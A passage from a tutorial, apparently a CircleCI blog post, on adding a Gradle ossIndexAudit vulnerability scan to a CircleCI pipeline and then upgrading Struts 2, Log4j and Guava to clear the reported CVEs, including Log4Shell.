    steps:
      - checkout
      - run:
          name: Scanning for Vulnerable Dependencies
          command: ./gradlew ossIndexAudit

This job scans for vulnerable dependencies using the ossIndexAudit Gradle task by:

  • Using Docker with OpenJDK 17
  • Checking out the project code
  • Running ./gradlew ossIndexAudit to detect known security issues in dependencies

Next, define it in the workflows section:

workflows:
  build-and-test:
    jobs:
      - test-java
      - vulnerable-dependencies-scan # the new job
    # - deploy:
    #     requires:      # list the scan here so a failed scan blocks deployment
    #       - test-java
    #       - vulnerable-dependencies-scan

You now have two active jobs, test-java and vulnerable-dependencies-scan; with no requires relationship between them, CircleCI runs them in parallel.

Push to the repository and view the logs in the CircleCI dashboard after the pipeline build.

CircleCI builds

Your build has failed. In a real setup, list vulnerable-dependencies-scan under the deploy job’s requires so that a failing scan blocks deployment; that is what forces the team to fix the finding before it reaches production rather than leaving it as an ignorable warning.

Check the details to make sure everything is the same as what you tried locally.

CircleCI builds

So, how do you fix the build? Update the dependencies to versions the scanner reports as clean (these were clean at the time of writing; the vulnerability database keeps growing, so a later run may flag them again):

implementation 'org.apache.struts:struts2-core:6.4.0'
implementation 'org.apache.logging.log4j:log4j-core:2.17.1'
implementation 'com.google.guava:guava:32.0.1-jre'

To summarize, this is the update we applied:

Library    Previous version   Updated version   Reason for upgrade
Struts 2   2.5.10             6.4.0             Clears the 12 CVEs reported above and brings newer versions of the transitive commons-fileupload and commons-io; a major-version jump, so expect API migration work
Log4j      2.14.1             2.17.1            Fixes Log4Shell (CVE-2021-44228) and the follow-ups CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832; JNDI lookups are disabled by default
Guava      24.1.1-jre         32.0.1-jre        Fixes CVE-2023-2976 and CVE-2020-8908 (temporary files in a shared directory), plus newer APIs and bug fixes

You can merge the circleci-project-setup branch into your main branch and safely delete it afterward.

Pipeline list

As expected, the build succeeds this time.

Build success

Conclusion

Detecting vulnerable dependencies is not optional: it’s a vital part of software development best practices. Just like weak building materials can endanger a house, outdated or insecure libraries can compromise your application, and your company. Manual checks via IDEs or local scans are prone to oversight and inconsistency, especially under the pressure of deadlines.

By integrating tools like the Sonatype Scan Gradle plugin into a CI/CD pipeline using CircleCI, your team gains a reliable, automated way to identify and mitigate risks early in the development process. This ensures not only better security and compliance but also faster, more confident delivery cycles.

Start automating your vulnerability scans today; secure code is sustainable code.

The complete code for this project is available on GitHub.
